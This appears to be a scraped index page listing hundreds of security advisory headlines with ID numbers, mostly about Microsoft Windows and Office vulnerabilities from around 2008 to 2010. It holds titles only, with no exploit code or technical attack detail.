ASP.NET Padding Oracle Attack Lets Remote Users Decrypt Data [1024445] Microsoft Outlook Web Access Authentication Flaw Lets Remote Users Hijack User Sessions [1024444] Windows Client-Server Runtime Subsystem Lets Local Users Gain Elevated Privileges [1024443] Microsoft Local Security Authority Subsystem Service (LSASS) Heap Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1024442] Microsoft WordPad Parsing Error in Text Converters Lets Remote Users Execute Arbitrary Code [1024440] Microsoft Internet Information Services Bugs Let Remote Users Bypass Authentication, Deny Service, and Execute Arbitrary Code [1024439] Microsoft Outlook Heap Overflow Lets Remote Users Execute Arbitrary Code [1024438] Microsoft Office Unicode Font Parsing in USP10.DLL Lets Remote Users Execute Arbitrary Code [1024437] Windows Unicode Scripts Processor Font Parsing Error in USP10.DLL Lets Remote Users Execute Arbitrary Code [1024436] Windows MPEG-4 Codec Processing Flaw Lets Remote Users Execute Arbitrary Code [1024435] Windows Print Spooler Access Permission Flaw Lets Remote Users Execute Arbitrary Code [1024358] Windows TCP/IP Stack IcmpSendEcho2Ex() Bug Lets Local Users Deny Service [1024355] Windows Applications May Load DLLs Unsafely and Remotely Execute Arbitrary Code [1024345] Windows Kernel win32k!GreStretchBltInternal() Bug Lets Local Users Deny Service [1024320] Windows Telephony Application Programming Interfaces Lets Certain Local Users Gain Elevated Privileges [1024311] Windows TCP/IP Stack Lets Local Users Gain Elevated Privileges and Remote Users Deny Service [1024310] Microsoft Office Excel Flaw Lets Remote Users Execute Arbitrary Code [1024309] Windows Movie Maker Memory Corruption Error in Processing Project Files Lets Remote Users Execute Arbitrary Code [1024308] Windows Drivers Let Local Users Gain Elevated Privileges or Deny Service [1024307] Windows Kernel Bugs Let Local Users Gain Elevated Privileges and Deny Service [1024306] Microsoft Silverlight Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1024305] Microsoft .NET Framework Virtual Method Delegate Processing Error Lets Remote Users Execute Arbitrary Code [1024304] Microsoft Cinepak Codec Memory Pointer Error Lets Remote Users Execute Arbitary Code [1024303] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Domain Attacks [1024302] Microsoft MPEG Layer-3 Codecs Stack Overflow Lets Remote Users Execute Arbitary Code [1024301] Microsoft XML Core Services (MSXML) HTTP Response Processing Flaw Lets Remote Users Execute Arbitrary Code [1024300] Windows Schannel Certificate Validation Error Lets Remote Users Execute Arbitrary Code [1024299] Windows Schannel Protocol Flaw in SSL Renegotiation May Let Remote Users Conduct Man-in-the-Middle Attacks [1024298] Microsoft Office Word RTF, Word, and HTML Processing Errors Let Remote Users Execute Arbitrary Code [1024297] Windows SMB Server Flaws Let Remote Users Deny Service and Execute Arbitrary Code [1024277] Citrix XenApp Online Plug-in for Windows Flaw Lets Remote Users Execute Arbitrary Code [1024189] Microsoft Office Outlook Validation Error in Processing Attachments Lets Remote Users Execute Arbitrary Code [1024188] Microsoft Office Access ActiveX Controls Let Remote Users Execute Arbitrary Code [1024186] HP Insight Control Server Migration for Windows Lets Remote Users Conduct Cross-Site Request Forgery Attacks and Local Users Gain Unauthorized Access to Data [1024084] Microsoft Help and Support Center URL Escaping Flaw Lets Remote Users Execute Arbitrary Commands [1024080] Microsoft .NET XML Digital Signature Flaw May Let Remote Users Bypass Authentication [1024079] Microsoft Internet Information Services Memory Allocation Error Lets Remote Authenticated Users Execute Arbitrary Code [1024078] Microsoft SharePoint Input Validation Flaw in toStaticHTML API Permits Cross-Site Scripting Attacks [1024077] Microsoft SharePoint Help Page Processing Bug Lets Remote Users Deny Service [1024076] Microsoft Office Excel Has Multiple Flaws That Let Remote Users Execute Arbitrary Code [1024075] Microsoft Office Open XML File Format Converter for Mac Lets Local Users Gain Elevated Privileges [1024074] Windows OpenType Compact Font Format Memory Corruption Error Lets Local Users Gain Elevated Privileges [1024073] Microsoft Office COM Object Instantiation Error Lets Remote Users Execute Arbitrary Code [1024072] Windows Kernel 'win32k.sys' Lets Local Users Gain Elevated Privileges [1024070] Microsoft Internet Explorer 8 Developer Tools ActiveX Control Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1024069] Windows Media Decompression Components Let Remote Users Execute Arbitrary Code [1024068] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Conduct Cross-Site Scripting Attacks [1023991] Windows Memory Error in Canonical Display Driver Lets Remote Users Execute Arbitrary Code [1023982] HP Insight Control Server Migration for Windows Input Validation Flaw Permits Cross-Site Scripting Attacks [1023975] Microsoft Office Memory Corruption Error in VBE6.DLL Lets Remote Users Execute Arbitrary Code [1023974] Microsoft Visual Basic for Applications Memory Corruption Error in VBE6.DLL Lets Remote Users Execute Arbitrary Code [1023973] Windows Mail Integer Overflow in Processing POP3/IMAP Responses Lets Remote Users Execute Arbitrary Code [1023972] Microsoft Outlook Express Integer Overflow in Processing POP3/IMAP Responses Lets Remote Users Execute Arbitrary Code [1023939] Windows SMTP Service Uses Predictable Transaction IDs and Fails to Validate Response IDs Which May Permit DNS Spoofing [1023938] Microsoft Office Visio Buffer Overflow in Processing DXF Files Lets Remote Users Execute Arbitrary Code [1023932] Microsoft Office SharePoint Input Validation Flaw in 'help.aspx' Permits Cross-Site Scripting Attacks [1023913] HP Virtual Machine Manager for Windows Lets Remote Authenticated Users Gain Elevated Privileges [1023857] Windows IPv6 Stack ISATAP Tunnel Validation Flaw Lets Remote Users Spoof IPv4 Addresses [1023856] Microsoft Visio Index Calculation and Attribute Validation Flaws Let Remote Users Execute Code [1023855] Microsoft Exchange May Disclose Message Fragments to Remote Users [1023854] Microsoft Exchange Error in Parsing MX Records Lets Remote Users Deny Service [1023853] Microsoft Office Publisher TextBox Processing Buffer Overflow Lets Remote Users Execute Arbitrary Code [1023851] Windows Media Services Stack Overflow in Processing Transport Information Packets Lets Remote Users Execute Arbitrary Code [1023850] Windows Kernel Flaws Let Local Users Gain Elevated Privileges and Deny Service [1023849] Windows Media Player ActiveX Control Lets Remote Users Execute Arbitrary Code [1023848] Microsoft MPEG Layer-3 Codecs Stack Overflow Lets Remote Users Execute Arbitary Code [1023847] Windows Server Message Block Client Message Processing Bugs Let Remote Users Execute Arbitrary Code [1023846] Windows Authenticode Signature Verification Flaws Let Remote Users Execute Arbitrary Code [1023773] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information [1023720] Microsoft Virtual PC/Server Lets Local Users Gain Elevated Privileges [1023699] Microsoft Internet Explorer Invalid Pointer Reference Lets Remote Users Execute Arbitrary Code [1023698] Microsoft Office Excel Bugs Let Remote Users Execute Arbitrary Code [1023697] Windows Movie Maker Buffer Overflow Lets Remote Users Cause Arbitrary Code to Be Executed [1023668] Windows VBScript Script Engine Flaw in Processing Windows Help Files Lets Remote Users Execute Arbitrary Code [1023656] Windows API Bug Lets Local Users Deny Service [1023570] Windows Kernel Double Free Memory Error Lets Local Users Gain Elevated Privileges [1023569] Windows Client-Server Run-time Subsystem Process Termination Flaw Lets Local Users Gain Elevated Privileges [1023568] Windows SMB Server Flaws Lets Remote Authenticated Users Execute Arbitrary Code and Let Remote Users Deny Service [1023567] Microsoft Hyper-V Instruction Validation Bug Lets Local Users Deny Service [1023565] Microsoft Office Buffer Overflow in 'MSO.DLL' Lets Remote Users Execute Arbitrary Code [1023564] Microsoft Paint Integer Overflow Lets Remote Users Execute Arbitrary Code [1023563] Microsoft PowerPoint Buffer Overflows and Memory Errors Let Remote Users Execute Arbitrary Code [1023562] Microsoft DirectShow Heap Overflow Lets Remote Users Execute Arbitrary Code [1023561] Windows TCP/IP Stack IPv6 and Header Processing Bugs Let Remote Users Execute Arbitrary Code [1023560] Microsoft Internet Explorer Flaw in Microsoft Data Analyzer ActiveX Control Lets Remote Users Execute Arbitrary Code [1023559] Windows Server Message Block Client Validation and Race Condition Flaws Let Remote Users Execute Arbitrary Code [1023545] OpenSolaris Flaw in kclient and smbadm When Joining a Windows Domain Has Unspecified Impact [1023542] Microsoft Internet Explorer Discloses Known Files to Remote Users [1023494] Microsoft Internet Explorer Cross-Site Scripting Filter Can Be Bypassed [1023493] Microsoft Internet Explorer Multiple Memory Access Flaws Let Remote Users Execute Arbitrary Code [1023471] Windows Kernel #GP Trap Handler Flaw Lets Local Users Gain Elevated Privileges [1023462] Microsoft Internet Explorer Invalid Pointer Reference Lets Remote Users Execute Arbitrary Code [1023435] Adobe Flash 6 on Windows XP Has Multiple Flaws That Let Remote Users Execute Arbitrary Code [1023432] Microsoft Embedded OpenType Font Engine Integer Overflow Lets Remote Users Execute Arbitrary Code [1023387] Microsoft Internet Information Services (IIS) Filename Extension Parsing Configuration Error May Let Users Bypass Security Controls [1023302] Windows Media Player Indeo Codec Bugs Let Remote Users Execute Arbitrary Code [1023301] Microsoft Internet Explorer Indeo Codec Bugs Let Remote Users Execute Arbitrary Code [1023297] Microsoft Local Security Authority Subsystem Service Validation Flaw Lets Remote Users Deny Service [1023296] Microsoft Active Directory Federation Services Lets Remote Authenticated Users Execute Arbitrary Code and Spoof Web Sites [1023294] Microsoft Office Word and WordPad Text Converter Memory Errors Let Remote Users Execute Arbitrary Code [1023293] Microsoft Internet Explorer Memory Access Flaws Let Remote Users Execute Arbitrary Code [1023292] Microsoft Office Publisher Memory Allocation Validation Flaw Lets Remote Users Execute Arbitrary Code [1023291] Microsoft Internet Authentication Service Bugs Let Remote Authenticated Users Execute Arbitrary Code or Gain Privileges of the Target User [1023233] Microsoft Internet Explorer Discloses Local Path Names When Printing Local HTML Files to PDF Files [1023226] Microsoft Internet Explorer Invalid Pointer Reference in getElementsByTagName() Method Lets Remote Users Execute Arbitrary Code [1023179] Windows Kernel Flaw Lets Remote Users Deny Service [1023158] Microsoft Word Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1023157] Microsoft Excel Bugs Let Remote Users Execute Arbitrary Code [1023156] Microsoft Active Directory Stack Memory Consumption Flaw Lets Remote Users Deny Service [1023155] Windows Kernel 'Win32k.sys' Bugs Let Remote Users Execute Arbitrary Code and Local Users Gain Elevated Privileges [1023154] Microsoft License Logging Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1023153] Microsoft Web Services on Devices API (WSDAPI) Validation Error Lets Remote Users Execute Arbitrary Code [1023146] Tomcat Windows Installer Creates Default Blank Administrative Password [1023126] XScreenSaver May Allow Pop-up Windows to Bypass the Screen Saver When Accessibility is Enabled [1023013] Microsoft Crypto API NULL Character Flaw in Common Name Field and ASN.1 Integer Overflow Lets Remote Users Spoof Certficiates [1023012] Windows Media Player Heap Overflow in Processing ASF Files Lets Remote Users Execute Arbitrary Code [1023011] Microsoft Indexing Service ActiveX Control Lets Remote Users Execute Arbitrary Code [1023010] Microsoft Local Security Authority Subsystem Service (LSASS) Integer Underflow Lets Local Users Deny Service [1023009] Microsoft Silverlight Memory Modification Flaw Lets Remote Users Execute Arbitrary Code [1023008] Microsoft .NET Bugs Let Remote Users Execute Arbitrary Code [1023006] Microsoft GDI+ Overflows Let Remote Users Execute Arbitrary Code [1023005] Windows Media Format Runtime Flaws Let Remote Users Execute Arbitrary Code [1023004] Windows Server Message Block Validation Errors Let Remote Users Deny Service and Execute Arbitrary Code [1023003] Windows Kernel Lets Local Users Gain Elevated Privileges or Deny Service [1023002] Microsoft Internet Explorer Flaws Let Remote Users Execute Arbitrary Code [1022848] Windows Server Message Block NEGOTIATE PROTOCOL REQUEST Processing Flaw Lets Remote Users Execute Arbitrary Code [1022846] Microsoft Wireless LAN AutoConfig Service Heap Overflow Lets Remote Wireless Users Execute Arbitrary Code [1022845] Windows TCP/IP Stack Flaws Let Remote Users Execute Arbitrary Code and Deny Service [1022844] Windows Media Format Runtime Bugs in Processing ASF and MP3 Files Let Remote Users Execute Arbitrary Code [1022843] Microsoft DHTML Editing Component ActiveX Control Lets Remote Users Execute Arbitrary Code [1022842] Microsoft JScript Scripting Engine Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1022792] Microsoft Internet Information Server (IIS) FTP Server Buffer Overflows Let Remote Authenticated Users Execute Arbitrary Code and Deny Service [1022716] Microsoft Telnet NTLM Credential Reflection Flaw Lets Remote Users Gain Access [1022715] Microsoft ASP.NET Request Scheduling Flaw Lets Remote Users Deny Service [1022714] Windows Message Queuing Service (MSMQ) NULL Pointer Flaw Lets Local Users Gain Elevated Privileges [1022713] Windows Workstation Service Double Free Memory Error Lets Local Users Gain Elevated Privileges [1022712] Microsoft Active Template Library (ATL) Bugs Let Remote Users Execute Arbitrary Code [1022711] Windows Media File Processing Flaw in Handling AVI Files Lets Remote Users Execute Arbitrary Code [1022709] Windows Remote Desktop Connection Heap Overflows Let Remote Users Execute Arbitrary Code [1022708] Microsoft Office Web Components Buffer Overflows in ActiveX Control Let Remote Users Execute Arbitrary Code [1022630] Windows Kernel win32k.sys Lets Local Users Gain Elevated Privileges [1022611] Microsoft Internet Explorer Memory Corruption Bugs Let Remote Users Execute Arbitrary Code [1022610] Microsoft Visual Studio Active Template Library Bugs Let Remote Users Execute Arbitrary Code [1022547] Microsoft Internet Security and Acceleration Server OTP Authentication Bug Lets Remote Users Access Resources [1022546] Microsoft Office Publisher Pointer Dereference Bug Lets Remote Users Execute Arbitrary Code [1022545] Microsoft DirectX DirectShow Validation Bugs Let Remote Users Execute Arbitrary Code [1022544] Microsoft Virtual PC/Server Lets Local Users Gain Elevated Privileges Within a Guest Operating System [1022543] Windows Embedded OpenType (EOT) Font Engine Buffer Overflow Lets Remote Users Execute Arbitrary Code [1022535] Microsoft Office Web Components Bug in Spreadsheet ActiveX Control Lets Remote Users Execute Arbitrary Code [1022514] Microsoft DirectShow Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code [1022369] Microsoft PowerPoint Buffer Overflow in Freelance Translator Lets Remote Users Execute Arbitrary Code [1022359] Windows Kernel Bugs Let Local Users Gain Elevated Privileges [1022358] Microsoft Internet Information Services WebDAV Bug Lets Remote Users Bypass Authentication [1022357] Windows RPC Marshalling Engine Memory Error Lets Local Users Gain Elevated Privileges [1022356] Microsoft Word Buffer Overflows Let Remote USers Execute Arbitrary Code [1022355] Microsoft Office Works Document Converter Bug Lets Remote Users Execute Arbitrary Code [1022354] Microsoft Works Document Converter Bug Lets Remote Users Execute Arbitrary Code [1022353] Windows Search Lets Remote Users Execute Scripting Code to Obtain Information [1022352] Windows Print Spooler Lets Remote Users Execute Arbitrary Code and Local Users Read Arbitrary Files [1022351] Microsoft Excel Bugs Let Remote Users Execute Arbitrary Code [1022350] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1022349] Microsoft Active Directory Bugs Let Remote Users Execute Arbitrary Code or Deny Service [1022299] Microsoft DirectX Bug in DirectShow QuickTime Parser Lets Remote Users Execute Arbitrary Code [1022240] Microsoft Internet Information Server WebDAV Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1022205] Microsoft PowerPoint Has Multiple Buffer Overflows and Memory Corruption Bugs That Let Remote Users Execute Arbitrary Code [1022046] Microsoft ISA Server Input Validation Flaw in 'cookieauth.dll' Permits Cross-Site Scripting Attacks [1022045] Microsoft ISA Server TCP State Error Lets Remote Users Deny Service [1022043] Microsoft WordPad and Office Text Converter Bugs Let Remote Users Execute Arbitrary Code [1022042] Microsoft Internet Explorer Bugs Let Remote Users Execute Arbitrary Code [1022041] Windows HTTP Services Bugs Let Remote Users Execute Arbitrary Code [1022040] Microsoft DirectX Bug in Decompressing DirectShow MJPEG Content Lets Remote Users Execute Arbitrary Code [1022039] Microsoft Excel Malformed Object Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1022009] XScreenSaver May Allow Pop-up Windows to Bypass the Screen Lock [1021976] VMware Windows 'vmci.sys' Driver Lets Local Users Gain Elevated Privileges [1021967] Microsoft Office PowerPoint Invalid Object Access Bug Lets Remote Users Execute Arbitrary Code [1021937] Windows Services for UNIX Unspecified Bugs in 'unlzh' and 'unpack' Let Users Execute Arbitrary Code [1021880] Microsoft Internet Explorer Unspecified Bug Lets Remote Users Execute Arbitrary Code [1021831] Microsoft DNS Server Bugs Let Remote Users Spoof the DNS Service [1021830] Microsoft DNS Server Registration Validation Flaw Lets Remote Users Conduct Spoofing Attacks [1021829] Microsoft WINS Server Registration Validation Flaw Lets Remote Users Conduct Spoofing Attacks [1021828] Windows SChannel TLS Handshake Authentication Flaw Lets Certain Remote Users Spoof the System [1021827] Windows Kernel Handle/Pointer Validation Bugs Let Local Users Gain System Privileges [1021826] Windows Kernel Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1021820] IBM Tivoli Storage Manager HSM for Windows Buffer Overflow May Let Remote Users Execute Arbitrary Code [1021744] Microsoft Excel Invalid Object Access Flaw Lets Remote Users Execute Arbitrary Code [1021702] Microsoft Visio Bugs Let Remote Users Execute Arbitrary Code [1021701] Microsoft Exchange MAPI Command Literal Processing Bug Lets Remote Users Deny Service [1021700] Microsoft Exchange Memory Corruption Error in Decoding TNEF Data Lets Remote Users Execute Arbitrary Code [1021699] Microsoft Internet Explorer Bugs in Handling CSS Sheets and Deleted Objects Lets Remote Users Execute Arbitrary Code [1021621] QuickTime Input Validation Flaw in MPEG-2 Playback Component for Windows Lets Remote Users Execute Arbitrary Code [1021560] Windows Server Message Block Buffer Overflow Lets Remote Users Execute Arbitrary Code [1021495] Windows Media Player Integer Overflow in Playing WAV Files Lets Remote Users Deny Service [1021490] Microsoft SQL Server Heap Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1021381] Microsoft Internet Explorer DHTML Data Binding Invalid Pointer Reference Bug Lets Remote Users Execute Arbitrary Code [1021376] Microsoft WordPad Word 97 Text Converter Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1021375] Windows Media Services Discloses Authentication Information to Remote Users [1021374] Windows Media Player Discloses Authentication Information to Remote Users [1021373] Windows Media Player Service Principal Name NTLM Authentication Implementation Lets Remote Users Execute Arbitrary Code [1021372] Windows Media Services Service Principal Name NTLM Authentication Implementation Lets Remote Users Execute Arbitrary Code [1021371] Microsoft Internet Explorer HTML Processing Bugs Let Remote Users Execute Arbitrary Code [1021370] Microsoft Word Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1021368] Microsoft Excel Formula, Object, and Global Array Bugs Let Remote Users Execute Arbitrary Code [1021367] Microsoft Office SharePoint Server Access Control Flaw Lets Remote Users Gain Administrative Access [1021366] Windows Search Bugs Let Remote Users Execute Arbitrary Code [1021365] Microsoft GDI Buffer Overflows in Processing WMF Files Lets Remote Users Execute Arbitrary Code [1021363] Microsoft SQL Server Memory Overwrite Bug in sp_replwritetovarbin May Let Remote Users Execute Arbitrary Code [1021294] Microsoft Office Communicator VoIP Processing Bugs Let Remote Users Deny Service [1021245] Windows Vista Buffer Overflow in CreateIpForwardEntry2() May Let Local Users Gain Elevated Privileges [1021190] Mozilla Firefox '.url' Windows Shortcut Files May Let Remote Users Obtain Potentially Sensitive Information [1021164] Microsoft XML Core Services (MSXML) Bugs Let Remote Users Obtain Information and Execute Arbitrary Code [1021163] Windows Server Message Block NTLM Authentication Replay Bug Lets Remote Users Execute Arbitrary Code [1021091] Windows Server Service RPC Processing Bug Lets Remote Users Execute Arbitrary Code [1021090] Cisco PIX Firewall Windows NT Domain Authentication Bug Lets Remote Users Bypass IPSec/SSL VPN Authentication [1021089] Cisco ASA Windows NT Domain Authentication Bug Lets Remote Users Bypass IPSec/SSL VPN Authentication [1021053] Microsoft Ancillary Function Driver 'afd.sys' Lets Local Users Gain Elevated Privileges [1021052] Microsoft Message Queuing (MSMQ) Heap Overflow Lets Remote Users Execute Arbitrary Code [1021051] Windows Kernel Virtual Address Descriptor Integer Overflow Lets Local Users Gain Elevated Privileges [1021049] Windows Server Message Block Buffer Underflow Lets Remote Authenticated Users Execute Arbitrary Code [1021047] Microsoft Internet Explorer Flaws Permit Cross-Domain Scripting Attacks and Let Remote Users Execute Arbitrary Code [1021046] Windows Kernel Bugs Let Local Users Gain Elevated Privileges [1021045] Microsoft Office CDO Protocol Bug Lets Remote Users Execute Arbitrary Scripting Code [1021044] Microsoft Excel Object, Calendar, and Formula Bugs Let Remote Users Execute Arbitrary Code [1021043] Microsoft Host Integration Server RPC Buffer Overflow Lets Remote Users Execute Arbitrary Code [1021042] Microsoft Active Directory LDAP Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1021020] Cisco Unity Bug in Microsoft API Lets Remote Users Deny Service [1021018] Microsoft Digital Image 'PipPPush.DLL' ActiveX Control Lets Remote Users Access Files [1020901] BIND Windows UDP Client Handler Bug Lets Remote Users Deny Service [1020887] Windows SMB Processing Bug Lets Remote Users Deny Service [1020845] Apple Bonjour for Windows mDNSResponder Null Pointer Dereference Lets Users Deny Service [1020844] Apple Bonjour for Windows DNS Query Port Entropy Weakness Lets Remote Users Spoof the System [1020839] iTunes Windows Driver Integer Overflow Lets Local Users Gain Elevated Privileges [1020838] Microsoft GDI+ Integer Overflow in Processing BMP Files Lets Remote Users Execute Arbitrary Code [1020837] Microsoft GDI+ Buffer Overflow in Processing WMF Files Lets Remote Users Execute Arbitrary Code [1020836] Microsoft GDI+ Bug in Processing GIF Image Files Lets Remote Users Execute Arbitrary Code [1020835] Microsoft GDI+ Memory Corruption Error in Processing EMF Image Files Lets Remote Users Execute Arbitrary Code [1020834] Microsoft GDI+ Heap Overflow in Processing Gradient Sizes Lets Remote Users Execute Arbitrary Code [1020833] Microsoft Office OneNote Buffer Overflow Lets Remote Users Execute Arbitrary Code [1020832] Windows Media Encoder Buffer Overflow Lets Remote Users Execute Arbitrary Code [1020831] Windows Media Player Bug in Playing Audio Files via Server-side Playlists Lets Remote Users Execute Arbitrary Code [1020733] Windows Media Services ActiveX Control Buffer Overflow in CallHTMLHelp() Function Lets Remote Users Execute Arbitrary Code [1020711] Windows nslookup Bug May Let Remote Users Execute Arbitrary Code [1020699] VERITAS Storage Foundation for Windows Accepts NULL NTLMSSP Authentication [1020681] Windows Messenger ActiveX Control Bug Lets Remote Users Obtain Information and Perform Chat Functions [1020680] Windows Mail MTHML Redirect Bug Lets Remote Users Obtain Information [1020679] Microsoft Outlook Express MTHML Redirect Bug Lets Remote Users Obtain Information [1020676] Microsoft PowerPoint Memory Errors Let Remote Users Execute Arbitrary Code [1020675] Microsoft Color Management Module Heap Overflow Lets Remote Users Execute Arbitrary Code [1020674] Microsoft Internet Explorer Multiple Bugs Let Remote Users Execute Arbitrary Code [1020673] Microsoft Office Format Filter Bugs Let Remote Users Execute Arbitrary Code [1020672] Microsoft Excel Input Validation Bug in Parsing Records Lets Remote Users Execute Arbitrary Code [1020671] Microsoft Excel Input Validation Bug in Processing Array Index Values Lets Remote Users Execute Arbitrary Code [1020670] Microsoft Excel Input Validation Bug in Processing Index Values Lets Remote Users Execute Arbitrary Code [1020669] Microsoft Excel Credential Caching Bug Lets Local Users Gain Access to Remote Data Sources [1020607] Mac OS X Quick Look Buffer Overflow in Downloading Microsoft Office Files Lets Remote Users Execute Arbitrary Code [1020447] Microsoft Word Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1020441] Microsoft SQL Server Bugs Let Remote Authenticated Users Obtain Information and Execute Arbitrary Code [1020439] Microsoft Outlook Web Access for Exchange Server Input Validation Bugs Permit Cross-Site Scripting Attacks [1020437] Windows DNS Service Bugs Let Remote Users Spoof the System [1020436] Windows Explorer Bug in Parsing Saved Search Files Lets Remote Users Execute Arbitrary Code [1020433] Microsoft Access Snapshot Viewer ActiveX Control Lets Remote Users Download Files to Arbitrary Locations [1020382] Microsoft Internet Explorer Lets Remote Users Conduct Cross-Domain Scripting Attacks [1020330] Safari for Windows WebKit JavaScript Array Memory Corrpution Bug Lets Remote Users Execute Arbitrary Code [1020329] Safari for Windows Bug with IE Trusted Zone Sites Lets Remote Users Execute Arbitrary Code [1020232] Microsoft Speech API Lets Remote Users Execute Arbitrary Commands [1020231] Windows Bug in Processing Pragmatic General Multicast Packets with an Invalid Fragment Option Lets Remote Users Deny Service [1020230] Windows Bug in Processing Pragmatic General Multicast Packets with an Invalid Option Length Lets Remote Users Deny Service [1020229] Microsoft Active Directory LDAP Validation Bug Lets Remote Users Deny Service [1020228] Microsoft WINS Data Structure Validation Bug Lets Local Users Gain Elevated Privileges [1020226] Microsoft Internet Explorer HTTP Request Header Bug May Let Remote Users Obtain Information in a Different Domain [1020225] Microsoft Internet Explorer Bug in Processing Method Calls Lets Remote Users Execute Arbitrary Code [1020223] Microsoft DirectX SAMI File Validation Bug Lets Remote Users Execute Arbitrary Code [1020222] Microsoft DirectX MJPEG Stream Error Handling Bug Lets Remote Users Execute Arbitrary Code [1020221] Windows Bluetooth Stack SDP Processing Bug Lets Remote Users Execute Arbitrary Code [1020197] VMware Tools Input Validation Flaw in Windows Guest OS Lets Local Users Gain Elevated Privileges [1020150] Apple Safari for Windows XP and Vista Lets Remote Users Download Files [1020016] Microsoft Malware Protection Engine Lets Remote Users Deny Service [1020015] Microsoft Publisher Bug in Processing Object Header Data Lets Remote Users Execute Arbitrary Code [1020014] Microsoft Word Memory Error in Processing CSS Values Lets Remote Users Execute Arbitrary Code [1020013] Microsoft Word Memory Error in Processing RTF Files Lets Remote Users Execute Arbitrary Code [1020007] Windows CE GDI+ and GIF Processing Bug Lets Remote Users Execute Arbitrary Code [1019904] Windows Kernel Bug Lets Local Users Gain LocalSystem Privileges [1019804] Microsoft Visio Lets Remote Users Execute Arbitrary Code [1019803] Windows Kernel Lets Local Users Gain Kernel Level Privileges [1019802] Windows DNS Client Lets Remote Users Spoof the System [1019801] Microsoft Internet Explorer Data Stream Processing Bug Lets Remote Users Execute Arbitrary Code [1019800] Microsoft Internet Explorer 'hxvz.dll' ActiveX Control Lets Remote Users Execute Arbitrary Code [1019799] Windows VBScript and JScript Scripting Engine Bug Lets Remote Users Execute Arbitrary Code [1019798] Microsoft GDI Buffer Overflow in Processing EMF and WMF Files Lets Remote Users Execute Arbitrary Code [1019797] Microsoft Project Memory Error Lets Remote Users Execute Arbitrary Code [1019738] Microsoft Office S/MIME Processing Lets Remote Users Access Arbitrary URLs [1019737] Windows Live Mail S/MIME Processing Lets Remote Users Access Arbitrary URLs [1019736] Microsoft Outlook S/MIME Processing Lets Remote Users Access Arbitrary URLs [1019686] Microsoft Jet Database Buffer Overflow in 'msjet40.dll' Lets Remote Users Execute Arbitrary Code via Word Documents [1019621] VMware Windows Hosted Systems Named Pipe Bugs Let Local Users Gain Elevated Privileges [1019616] GroupWise Windows Client API Bug Lets Remote Authenticated Users Access E-mail [1019605] Citrix Presentation Server Client for Windows May Disclose Credentials to Local Users [1019587] Microsoft Excel Input Validation Bug in Processing Conditional Formatting Values Lets Remote Users Execute Arbitrary Code [1019586] Microsoft Excel Input Validation Bug in Processing Rich Text Data Lets Remote Users Execute Arbitrary Code [1019585] Microsoft Excel Formula Parsing Error Lets Remote Users Execute Arbitrary Code [1019584] Microsoft Excel Input Validation Bug in Processing Style Record Data Lets Remote Users Execute Arbitrary Code [1019583] Microsoft Excel Flaw in Importing '.slk' Files Lets Remote Users Execute Arbitrary Code [1019582] Microsoft Excel Input Validation Bug in Processing Data Validation Records Lets Remote Users Execute Arbitrary Code [1019581] Microsoft Office Web Components DataSource Bug Lets Remote Users Execute Arbitrary Code [1019580] Microsoft Office Web Components URL Parsing Bug Lets Remote Users Execute Arbitrary Code [1019579] Microsoft Outlook 'mailto:' URL Validation Flaw Lets Remote Users Execute Arbitrary Code [1019578] Microsoft Office and Excel Memory Corruption Bugs Let Remote Users Execute Arbitrary Code [1019525] Symantec Backup Exec for Windows Server ActiveX Control Unsafe Methods Let Remote Users Execute Arbitrary Code [1019524] Symantec Backup Exec for Windows Server ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019388] Microsoft Works/Microsoft Office Bug in Processing '.wps' Field Length Values Lets Remote Users Execute Arbitrary Code [1019387] Microsoft Works/Microsoft Office Bug in Processing '.wps' Header Index Table Lets Remote Users Execute Arbitrary Code [1019386] Microsoft Works/Microsoft Office Bug in Processing '.wps' File Section Length Headers Lets Remote Users Execute Arbitrary Code [1019385] Microsoft Internet Information Services Error in Processing ASP Page Input Lets Remote Users Execute Arbitrary Code [1019384] Microsoft Internet Information Services File Change Notification Bug Lets Local Users Gain Elevated Privileges [1019383] Windows Vista TCP/IP Stack DHCP Response Processing Bug Lets Remote Users Deny Service [1019381] Microsoft Internet Explorer Argument Validation Flaw in 'dxtmsft.dll' Lets Remote Users Execute Arbitrary Code [1019380] Microsoft Internet Explorer Property Method Processing Bug Lets Remote Users Execute Arbitrary Code [1019379] Microsoft Internet Explorer HTML Layout Rendering Bug Lets Remote Users Execute Arbitrary Code [1019378] Microsoft Internet Explorer Buffer Overflow in Fox Pro ActiveX Control Lets Remote Users Execute Arbitrary Code [1019377] Microsoft Office Publisher Memory Corruption Bug Lets Remote Users Execute Arbitrary Code [1019376] Microsoft Office Publisher Invalid Memory Reference Bug Lets Remote Users Execute Arbitrary Code [1019375] Microsoft Office Object Processing Flaw Lets Remote Users Execute Arbitrary Code [1019374] Microsoft Word Memory Error Lets Remote Users Execute Arbitrary Code [1019373] Windows Heap Overflow in Object Linking and Embedding (OLE) Automation Lets Remote Users Execute Arbitrary Code [1019372] Windows WebDAV Mini-Redirector Response Handling Bug Lets Remote Users Execute Arbitrary Code [1019258] Microsoft Visual Basic '.dsr' File Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019200] Microsoft Excel File Header Bug Lets Remote Users Execute Arbitrary Code [1019166] Windows TCP/IP Stack ICMP and IGMP Bugs Let Remote Users Deny Service and Execute Arbitrary Code [1019078] Microsoft Internet Explorer Object Access Bugs Let Remote Users Execute Arbitrary Code [1019077] Microsoft Message Queuing (MSMQ) Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019075] Windows Vista 